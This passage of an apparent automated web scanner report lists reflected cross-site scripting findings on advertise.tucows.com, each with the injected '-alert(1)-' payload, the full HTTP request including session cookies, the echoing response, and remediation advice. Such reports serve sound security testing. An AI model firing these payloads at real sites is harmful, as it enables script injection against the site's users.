Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js78547"-alert(1)-"ce4057ee76f/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.15. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a92"-alert(1)-"496766b8176 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/ajaxlib.js46a92"-alert(1)-"496766b8176 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/ajaxlib.js46a92"-alert(1)-"496766b8176";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.16. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4586a"-alert(1)-"2bd19196b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes4586a"-alert(1)-"2bd19196b6c/js/show_layer.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes4586a"-alert(1)-"2bd19196b6c/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.17. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac19"-alert(1)-"1250877226f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js5ac19"-alert(1)-"1250877226f/show_layer.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js5ac19"-alert(1)-"1250877226f/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.18. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 835b0"-alert(1)-"17c882840e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/show_layer.js835b0"-alert(1)-"17c882840e0 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/show_layer.js835b0"-alert(1)-"17c882840e0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.19. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 624a4"-alert(1)-"3358fadd2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes624a4"-alert(1)-"3358fadd2b6/js/signupin.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:21 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes624a4"-alert(1)-"3358fadd2b6/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.20. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b36c3"-alert(1)-"b205bb5d532 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb36c3"-alert(1)-"b205bb5d532/signupin.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/jsb36c3"-alert(1)-"b205bb5d532/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.21. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28622"-alert(1)-"2ff515b5d95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/signupin.js28622"-alert(1)-"2ff515b5d95 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:48 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/signupin.js28622"-alert(1)-"2ff515b5d95";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.22. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42de8"-alert(1)-"7d8ee46561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes42de8"-alert(1)-"7d8ee46561/js/x_core.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes42de8"-alert(1)-"7d8ee46561/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.23. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b15de"-alert(1)-"e0f1f5c84c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb15de"-alert(1)-"e0f1f5c84c9/x_core.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/jsb15de"-alert(1)-"e0f1f5c84c9/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.24. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/x_core.js

Issue detail

